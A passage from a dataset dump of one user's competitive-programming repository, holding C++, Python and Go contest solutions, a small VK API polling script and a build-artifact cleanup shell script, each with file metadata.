q.push(make_pair(0, s));\n d.clear();\n d.resize(2 * n + 2, INF);\n d[s] = 0;\n mn = INF;\n while (!q.empty())\n {\n u = q.top().second;\n curd = -q.top().first;\n q.pop();\n if (curd > d[u])\n continue;\n for (int i = 1; i < edges[u].size(); i++)\n {\n if (edges[u][i].c <= edges[u][i].f)\n continue;\n v = edges[u][i].y;\n w = edges[u][i].p;\n if (u == v)\n continue;\n dfi = d[u] + w;\n if (d[v] > dfi)\n {\n d[v] = dfi;\n pp[v] = u;\n mn = min(edges[u][i].c - edges[u][i].f, mn);\n place[v] = i;\n q.push(make_pair(-d[v], v));\n }\n }\n }\n return (d[f] == INF) ? -1 : d[f];\n}\n\nint dfs(int k)\n{\n vis[k] = true;\n int t = p[k];\n int temp = k;\n int d = INF;\n for (int j = 1; j <= n; j++)\n if (!vis[j])\n {\n if (edges[t][j].f == 1 && edges[t][j].p - dr[t] - dc[j] < minv[j])\n {\n minv[j] = edges[t][j].p - dr[t] - dc[j];\n minpos[j] = k;\n }\n if (minv[j] < d)\n {\n d = minv[j];\n temp = j;\n }\n }\n for (int j = 0; j <= n; j++)\n if (vis[j])\n {\n dr[p[j]] += d;\n dc[j] -= d;\n } else\n minv[j] -= d;\n return p[temp] != 0 ? dfs(temp) : temp;\n}\n\nvoid rec(int k)\n{\n p[k] = p[minpos[k]];\n if (minpos[k] != 0)\n rec(minpos[k]);\n}\n\nint ans()\n{\n dr.clear();\n dc.clear();\n p.clear();\n minpos.clear();\n dr.resize(n + 1);\n dc.resize(n + 1);\n p.resize(n + 1);\n minpos.resize(n + 1);\n for (int i = 1; i <= n; i++)\n {\n p[0] = i;\n minv.clear();\n vis.clear();\n minv.resize(n + 1, INF);\n vis.resize(n + 1, false);\n rec(dfs(0));\n }\n answer[size].resize(n + 1);\n for (int i = 1; i <= n; i++)\n edges[p[i]][i].f = 0,\n answer[size][p[i]] = i;\n size++;\n return -dc[0];\n}\n\nint main()\n{\n freopen(\"multiassignment.in\", \"r\", stdin);\n freopen(\"multiassignment.out\", \"w+\", stdout);\n int z;\n scanf(\"%d %d\\n\", &n, &z);\n b.resize(n + 2);\n answer.resize(z + 1);\n size = 1;\n f = 2 * n + 1;\n edges.resize(2 * n + 2);\n place.resize(2 * n + 2);\n pp.resize(2 * n + 2);\n int x, y, add;\n int price = 0, c;\n edge e = edge(0, 0, 0, 0, -1);\n for (int i = 0; i <= 2 * n + 1; i++)\n edges[i].push_back(e);\n for (int i = 1; i <= n; i++)\n {\n b[i].resize(n + 1, false);\n edge r0 = edge(i, z, 0, 1, n + 1);\n edges[0].push_back(r0);\n for (int j = 1; j <= n; j++)\n {\n scanf(\"%d\", &x);\n edge r = edge(n + j, 1, 0, x, edges[n + j].size());\n edge r5 = edge(i, 0, 0, -x, edges[i].size());\n edges[i].push_back(r);\n edges[j + n].push_back(r5);\n }\n scanf(\"\\n\");\n }\n for (int i = 1; i <= n; i++)\n {\n edge r8 = edge(0, 0, 0, -1, i);\n edge r2 = edge(2 * n + 1, z, 0, 1, edges[2 * n + 1].size());\n edge r7 = edge(i + n, 0, 0, -1, edges[i + n].size());\n edges[i].push_back(r8);\n edges[i + n].push_back(r2);\n edges[2 * n + 1].push_back(r7);\n }\n fclose(stdin);\n while (true)\n {\n add = dijkstra();\n if (add == -1)\n break;\n for (int v = f; v != s; v = pp[v])\n edges[pp[v]][place[v]].f += mn,\n edges[edges[pp[v]][place[v]].y][ edges[pp[v]][place[v]].opp ].f -= mn;\n }\n int cost = 0;\n for (int i = 1; i <= z; i++)\n cost += ans();\n printf(\"%d\\n\", cost);\n for (int i = 1; i <= z; i++)\n for (int j = 1; j <= n; j++)\n printf(\"%d%c\", answer[i][j], j == n ? '\\n' : ' ');\n fclose(stdin);\n fclose(stdout);\n return 0;\n}\n" }, { "alpha_fraction": 0.40077605843544006, "alphanum_fraction": 0.4210088551044464, "avg_line_length": 24.05555534362793, "blob_id": "266ea4ae4153695941d913ad74d0ca489c15016e", "content_id": "67c5bd8f665d0af4b76c3ee0acd102b1caa9aef1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3608, "license_type": "no_license", "max_line_length": 107, "num_lines": 144, "path": "/2019/GCJ2/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\n\n//binSearch\n//x -> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps = 1)\n{\n T m;\n while (fabs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? l : r;\n}\n//Igorjan\n//}}}\n\nstruct rational\n{\n int num, den;\n rational() : num(0), den(1) {}\n rational(int num, int den)\n {\n if (den == 0)\n this->den = 0,\n this->num = 1;\n else if (num == 0)\n this->den = 1,\n this->num = 0;\n else\n {\n int g = __gcd(abs(den), abs(num));\n den /= g;\n num /= g;\n if (den < 0)\n den *= -1,\n num *= -1;\n this->den = den;\n this->num = num;\n }\n }\n\n bool operator<(const rational& b) const {\n return num * 1ll * b.den < den * 1ll * b.num;\n }\n\n bool operator<=(const rational& b) const {\n return num * 1ll * b.den <= den * 1ll * b.num;\n }\n};\n\nostream& operator<<(ostream& os, const rational& rat)\n{\n return os << rat.num << \"/\" << rat.den;\n}\n\nvoid run()\n{\n int n;\n cin >> n;\n vector<pii> a(n), b;\n rational mn(MOD, 1), mx, zero;\n fori(n) cin >> a[i].first >> a[i].second;\n fori(n)\n FOR(j, i + 1, n)\n {\n int A = a[j].first - a[i].first;\n int B = a[i].second - a[j].second;\n if ((A == 0 && B > 0) || (B == 0 && A < 0))\n {\n cout << \"IMPOSSIBLE\\n\";\n return;\n }\n if (A == 0 || B == 0)\n continue;\n rational temp(B, A);\n if (A < 0)\n mn = min(mn, temp);\n else if (A > 0)\n mx = max(mx, temp);\n //cout << (i + 1) << \" \" << (j + 1) << \" \" << B << \" \" << A << \" \" << temp << \"\\n\";\n }\n if (mn <= mx || mn <= zero)\n cout << \"IMPOSSIBLE\\n\";\n else\n {\n for (int x = mx.num / mx.den + 1; x <= 10000; ++x)\n {\n int y = binSearch(1, MOD, [&](int m) {\n return x * 1ll * mn.den < m * 1ll * mn.num;\n });\n rational temp(x, y);\n if (mx < temp && temp < mn)\n {\n cout << x << \" \" << y << \"\\n\";\n return;\n }\n }\n cout << \"IMPOSSIBLE\\n\";\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n int t;\n cin >> t;\n fori(t)\n cout << \"Case #\" << (i + 1) << \": \",\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.40697672963142395, "alphanum_fraction": 0.42635658383369446, "avg_line_length": 17.39285659790039, "blob_id": "5691002bfdc617f4112bea9d5c5bbaecf918d60a", "content_id": "2183bcaeb4e8ad8b253de2c985fd903612e93f5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 516, "license_type": "no_license", "max_line_length": 47, "num_lines": 28, "path": "/2013/2013RCC3/message_nv.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cstdio>\n#include <string>\n\nusing namespace std;\n\nconst int MOD = 1e9 + 7;\n\nint main()\n{\n\tint n;\n\tcin >> n;\n\twhile (n--) {\n\t\tstring s;\n\t\tcin >> s;\n\t\tint k = s.size() / 2;\n\t\tlong long ans = 1, all = 1;\n\t\tfor (int i = 0; i < 2 * k; i++)\n\t\t\tall *= (s[i] == '?') + 1, all %= MOD;\n\t\tint i = 0;\n\t\twhile (i < k) {\n\t\t\tint cnt = (s[i] == '?') + (s[i + k] == '?');\n\t\t\tif (s[i] == s[i + k] && s[i] != '?') cnt++;\n\t\t\tans *= cnt, ans %= MOD, i++;\n\t\t}\n\t\tcout << (all - ans + MOD) % MOD << \"\\n\";\n\t}\n}\n\n" }, { "alpha_fraction": 0.5903614163398743, "alphanum_fraction": 0.6127366423606873, "avg_line_length": 22.239999771118164, "blob_id": "f8b3bb71d5bbaf8671b82ea536b8450ef6f2a65a", "content_id": "2ca12c9c8d14f239f6ac120d622354976c9e149b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 52, "num_lines": 25, "path": "/scripts/parserZaika.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import vk\nfn = '.zaika.date'\ndef writeFile(filename, date):\n with open(filename, 'w') as f:\n f.write(str(date))\n\ndef readFile(filename):\n try:\n with open(filename, 'r') as f:\n return int(f.readlines()[0])\n except:\n return 0\n\nlastDate = readFile(fn)\nnextDate = lastDate\nprint('CUR', lastDate)\nx = vk.vk('wall.get', count=10, owner_id=-186426881)\nfor item in list(x['items']):\n if item.date > lastDate:\n print(item.date)\n else:\n print('EXPIRED', item.date)\n nextDate = max(nextDate, item.date)\n\nwriteFile(fn, nextDate)\n" }, { "alpha_fraction": 0.35169491171836853, "alphanum_fraction": 0.3813559412956238, "avg_line_length": 17.153846740722656, "blob_id": "b37e0c65aeb36d76daec571802c4c2e479a61722", "content_id": "e91111331a493f3d6ebac7811878edacfe393dd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 236, "license_type": "no_license", "max_line_length": 40, "num_lines": 13, "path": "/CodeForce/gym/101090/H.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\nk = int(input())\ns = input()\nn = len(s)\nfor i in range(n):\n if s[i] == '1':\n for j in range(i + k + 1, n, k):\n if s[j] == '1':\n print(i + 1, j + 1)\n sys.exit()\n\nprint(0, 0)\n" }, { "alpha_fraction": 0.4674759805202484, "alphanum_fraction": 0.4908497929573059, "avg_line_length": 26.05392074584961, "blob_id": "93151c6ef4f15451b19ce7d00eb09a199301d9ec", "content_id": "68a20c8f5461ade0f2e243e28445568e78fde465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5519, "license_type": "no_license", "max_line_length": 173, "num_lines": 204, "path": "/CodeForce/1769/D1.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\ntypedef bitset<37> state;\n\nmap<char, int> m = {\n {'6', 0},\n {'7', 1},\n {'8', 2},\n {'9', 3},\n {'T', 4},\n {'J', 5},\n {'Q', 6},\n {'K', 7},\n {'A', 8}\n};\nauto mm = \"6789TJQKA\";\nmap<char, int> z = {\n {'C', 0},\n {'D', 1},\n {'S', 2},\n {'H', 3},\n};\nauto zz = \"CDSH\";\n\nint get(const string& s)\n{\n return m[s[0]] + 9 * z[s[1]];\n}\n\nstring unwrap(int x)\n{\n int M = x % 9;\n int Z = x / 9;\n string s;\n s += mm[M];\n s += zz[Z];\n return s;\n}\n\nstate convert(const vector<string>& ss) {\n state cc;\n for (const string& s: ss)\n cc[get(s)] = true;\n return cc;\n};\n\nvector<string> unconvert(const state& cc) {\n vector<string> ss;\n fori(36)\n if (cc[i])\n ss.pb(unwrap(i));\n return ss;\n};\n\ntypedef array<state, 3> states;\n\nvector<states> go(const state& s, const state& cur, const state& other) {\n vector<states> ans;\n bool step = s[36];\n const auto& cards = step ? cur : other;\n for (int i = cards._Find_first(); i < SZ(cards); i = cards._Find_next(i))\n {\n int value = i % 9;\n if (value == 3 || (value < 3 && s[i + 1]) || (value > 3 && s[i - 1]))\n {\n auto ns = s;\n auto nc = cards;\n ns[i].flip();\n nc[i].flip();\n ns[36].flip();\n ans.pb({ns, step ? nc : cur, step ? other : nc});\n }\n }\n\n if (ans.size() == 0)\n {\n auto ns = s;\n ns[36].flip();\n ans.pb({ns, cur, other});\n }\n return ans;\n}\n\nvoid run()\n{\n vector<string> alice(18);\n vector<string> bob(18);\n readln(alice, bob);\n state a = convert(alice);\n state b = convert(bob);\n\n unordered_map<state, int> cache;\n\n states start = {state(), a, b};\n start[0][36] = true;\n\n auto dfs = [&](auto dfs, const states& s) -> int {\n auto it = cache.find(s[0]);\n if (it != cache.end())\n return it->second;\n\n auto f = [&]() -> int {\n bool step = s[0][36];\n //fori(3)\n //writeln(s[i].to_string());\n //writeln(); cout.flush();\n\n if (s[1].count() == 0)\n return s[2].count();\n if (s[2].count() == 0)\n return -int(s[1].count());\n auto nstates = go(s[0], s[1], s[2]);\n vector<int> pos;\n vector<int> neg;\n for (auto& ns: nstates)\n {\n auto ret = dfs(dfs, ns);\n if (ret > 0)\n pos.pb(ret);\n else\n neg.pb(ret);\n if ((step && ret > 0) || (!step && ret < 0))\n break;\n }\n sort(all(pos));\n sort(all(neg));\n if (step) //Alice\n {\n if (pos.size())\n return pos.back();\n return neg.back();\n }\n else\n {\n if (neg.size())\n return neg.back();\n return pos.back();\n }\n };\n return cache[s[0]] = f();\n };\n auto winner = dfs(dfs, start);\n if (winner > 0)\n writeln(\"Alice\");\n else\n writeln(\"Bob\");\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\" \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4860302805900574, "alphanum_fraction": 0.49068683385849, "avg_line_length": 29.140350341796875, "blob_id": "581915b763a67c213415b08e0c74f2434928dd22", "content_id": "d8423439c5329d2444f917f887695fddf279b219", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1718, "license_type": "no_license", "max_line_length": 96, "num_lines": 57, "path": "/2021/yandexBackendFinal/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "categories = {}\noffers = []\n\ninput()\n\ncategory = {}\nwhile True:\n s = input().strip()\n if s.startswith('-'):\n if 'id' in category:\n category['id'] = int(category['id'])\n categories[category['id']] = category\n category = {}\n s = s[2:]\n if s == 'offers:':\n category['id'] = int(category['id'])\n categories[category['id']] = category\n break\n s = s.split(':', 1)\n category[s[0]] = s[1].strip()\n\ntry:\n offer = {}\n while True:\n s = input().strip()\n if s.startswith('-'):\n if 'id' in offer:\n offer['price'] = int(offer['price'])\n categoryId = int(offer['categoryId'])\n del offer['categoryId']\n offer['id'] = int(offer['id'])\n category = categories[categoryId]\n if not 'minOffer' in category or category['minOffer']['price'] > offer['price']:\n categories[categoryId]['minOffer'] = offer\n if not 'maxOffer' in category or category['maxOffer']['price'] < offer['price']:\n categories[categoryId]['maxOffer'] = offer\n offer = {}\n s = s[2:]\n s = s.split(':', 1)\n offer[s[0]] = s[1].strip()\nexcept:\n pass\n\n\ndef printOffer(offer, title):\n print(f' {title}:')\n print(' id:', offer['id'])\n print(' name:', offer['name'])\n print(' description:', offer['description'])\n print(' price:', offer['price'])\n\nfor x in categories.values():\n if 'minOffer' in x:\n print('- id:', x['id'])\n print(' name:', x['name'])\n printOffer(x['minOffer'], 'minOffer')\n printOffer(x['maxOffer'], 'maxOffer')\n" }, { "alpha_fraction": 0.5426540374755859, "alphanum_fraction": 0.549763023853302, "avg_line_length": 37.3636360168457, "blob_id": "afdfe495a14bb4db4d43d0d6b37a7e762df75978", "content_id": "b2e02e3d47e7e88b48cccbb4f855d87256dea708", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 422, "license_type": "no_license", "max_line_length": 244, "num_lines": 11, "path": "/staff/cleaner.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "if [ $# -eq 1 ]\nthen a=$1\nfi\n\nif [ $# -eq 0 ]\nthen a=\"echo\"\nfi\n#find . -executable -type f ! -wholename './perl/*' ! -wholename './*pl' ! -wholename '*git*' ! -wholename './*.py' ! -wholename './*perl' ! -wholename './cleaner' ! -wholename './*.java' ! -wholename './*.sh' ! -wholename '*TDGame*' | xargs $a\nfind . -wholename './*.o' | xargs $a\nfind . -wholename './*.class' | xargs $a\nfind . -wholename './*~' | xargs $a\n" }, { "alpha_fraction": 0.460317462682724, "alphanum_fraction": 0.4682539701461792, "avg_line_length": 13.823529243469238, "blob_id": "4e7ae42ca0082410812ba1a1f92ad5a81c07779a", "content_id": "4d09c14b4654e93e5bd8baf282cf35d6599cf6aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 252, "license_type": "no_license", "max_line_length": 33, "num_lines": 17, "path": "/2017/newYear/M.go", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package main\n\nimport \"fmt\"\n\nfunc main() {\n\tvar s string\n\tfmt.Scan(&s)\n\tans := 0\n\tvar fix = map[byte]int{}\n\tfor i := range s {\n fix[s[i]] = fix[s[i]] + 1\n if (fix[s[i]] > ans) {\n ans = fix[s[i]]\n }\n\t}\n\tfmt.Println(ans)\n}\n" }, { "alpha_fraction": 0.49819493293762207, "alphanum_fraction": 0.521918535232544, "avg_line_length": 31.316667556762695, "blob_id": "5b6ead84552ee3bff02eaf76a52e536291ffb7a2", "content_id": "d176b006f140b3434045794ba1087e9d1c40c532", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3878, "license_type": "no_license", "max_line_length": 174, "num_lines": 120, "path": "/CodeForce/0159/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\ntypedef pair<ll, int> q;\nvoid run()\n{\n ints(n);\n map<int, vector<pii>> m;\n fori(n)\n {\n ints(c, s);\n m[c].emplace_back(s, i + 1);\n }\n\n vector<vector<q>> mx(n + 1);\n for (auto& [c, v]: m)\n {\n sort(all(v));\n reverse(all(v));\n ll sum = 0;\n fori(v.size())\n {\n sum += v[i].first;\n mx[i + 1].emplace_back(sum, c);\n }\n }\n fori(n)\n sort(all(mx[i])),\n reverse(all(mx[i]));\n\n array<q, 3> ans;\n\n auto get = [&](const q& a, const q& b) {\n return a.first + b.first;\n };\n for (int i = n; i >= 0; --i)\n {\n forj1(mx[i].size())\n if (mx[i][j].second != mx[i][0].second)\n {\n auto temp = get(mx[i][0], mx[i][j]);\n if (temp > get(ans[0], ans[1]))\n ans = {mx[i][0], mx[i][j], {i, i}};\n }\n if (i >= 2 && mx[i].size() >= 1)\n forj(mx[i - 1].size())\n if (mx[i][0].second != mx[i - 1][j].second)\n {\n auto temp = get(mx[i][0], mx[i - 1][j]);\n if (temp > get(ans[0], ans[1]))\n ans = {mx[i][0], mx[i - 1][j], {i, i - 1}};\n }\n }\n writeln(get(ans[0], ans[1]));\n vector<int> vv;\n fori(ans[2].second)\n vv.pb(m[ans[0].second][i].second),\n vv.pb(m[ans[1].second][i].second);\n if (ans[2].first > ans[2].second)\n vv.pb(m[ans[0].second][ans[2].first - 1].second);\n \n writeln(vv.size());\n writeln(vv);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5482895374298096, "alphanum_fraction": 0.5598185658454895, "avg_line_length": 25.06403923034668, "blob_id": "6e5c3542e0deaf383a45cccde292ffa4fed63f8c", "content_id": "95cb9acdc73982d1a98cd50b0facd916526cd947", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5291, "license_type": "no_license", "max_line_length": 139, "num_lines": 203, "path": "/2015/snws2/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//Igorjan94, template version from 11 January 2015\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define fst first\n#define snd second\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define eb emplace_back\n#define vs vector<string>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int>>\n#define pll pair<long long, long long>\n#define elohw(a) a.rbegin(), a.rend()\n#define whole(a) a.begin(), a.end()\n#define next _next\n#define prev _prev\n\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n#define wr(args...) err(split(#args,',').begin(),args)\n\n#define FILENAME \"input\"\n#define INF 1000000007\n\n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T &a);\nttti void priws(T a);\nttti void print(T a);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){priws(*f);for(auto i=++f;i!=s;++i)print(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n#define ints(args...) int args; readln(args)\n#define lll (args...) ll args; readln(args)\n#define FORI(n) for (unsigned i = 0; i < n; ++i)\n#define FORJ(n) for (unsigned j = 0; j < n; ++j)\n\ntemplate<class Type> Type powbin(Type a, int n);\n\ntemplate <typename T> class Matrix\n{\npublic:\n std::vector<std::vector<T> > a;\n unsigned n;\n unsigned m;\n\n Matrix(unsigned n, unsigned m, const T& initial);\n virtual ~Matrix();\n\n Matrix<T> operator^(int deg);\n Matrix<T> operator*(const Matrix<T>& rhs);\n Matrix<T>& operator*=(const Matrix<T>& rhs);\n std::vector<T>& operator[](int i);\n};\n\n\ntemplate<typename T>\nstd::vector<T>& Matrix<T>::operator[](int i)\n{\n return a[i];\n}\n\ntemplate<typename T>\nMatrix<T>::Matrix(unsigned n, unsigned m, const T& initial)\n{\n this->n = n;\n this->m = m;\n a.resize(n);\n FORI(n)\n a[i].resize(m, initial);\n}\n\ntemplate<typename T>\nMatrix<T>::~Matrix() {}\n\ntemplate<typename T>\nMatrix<T> Matrix<T>::operator*(const Matrix<T>& rhs)\n{\n unsigned nn = this->n;\n unsigned mm = rhs.m;\n Matrix result(nn, mm, (T) 0);\n FORI(nn)\n FORJ(mm)\n for (unsigned k = 0; k < this->m; k++)\n (result.a[i][j] += this->a[i][k] * rhs.a[k][j]) %= 6;\n return result;\n}\n\ntemplate<typename T>\nMatrix<T>& Matrix<T>::operator*=(const Matrix<T>& rhs)\n{\n Matrix result = (*this) * rhs;\n (*this) = result;\n return *this;\n}\n\ntemplate<typename T>\nMatrix<T> Matrix<T>::operator^(int i)\n{\n Matrix temp = *this;\n temp = powbin(temp, i);\n return temp;\n}\n\ntemplate<class Type>\nType powbin(Type a, int n)\n{\n Type result = a;\n --n;\n while (n)\n {\n if (n & 1)\n result *= a;\n a *= a;\n n >>= 1;\n }\n return result;\n}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n\nbool run()\n{ \n ints(n, m);\n if (n + m == 0)\n return false;\n Matrix<ll> A(n, m, 0);\n Matrix<ll> B(m, n, 0);\n readln(A.a, B.a);\n Matrix<ll> C = A * ((B * A) ^ (n * n - 1)) * B;\n ll ans = 0;\n fori(n)\n forj(n)\n ans += C[i][j];\n writeln(ans);\n return true;\n}\n\nint main()\n{\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n while (run());\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i 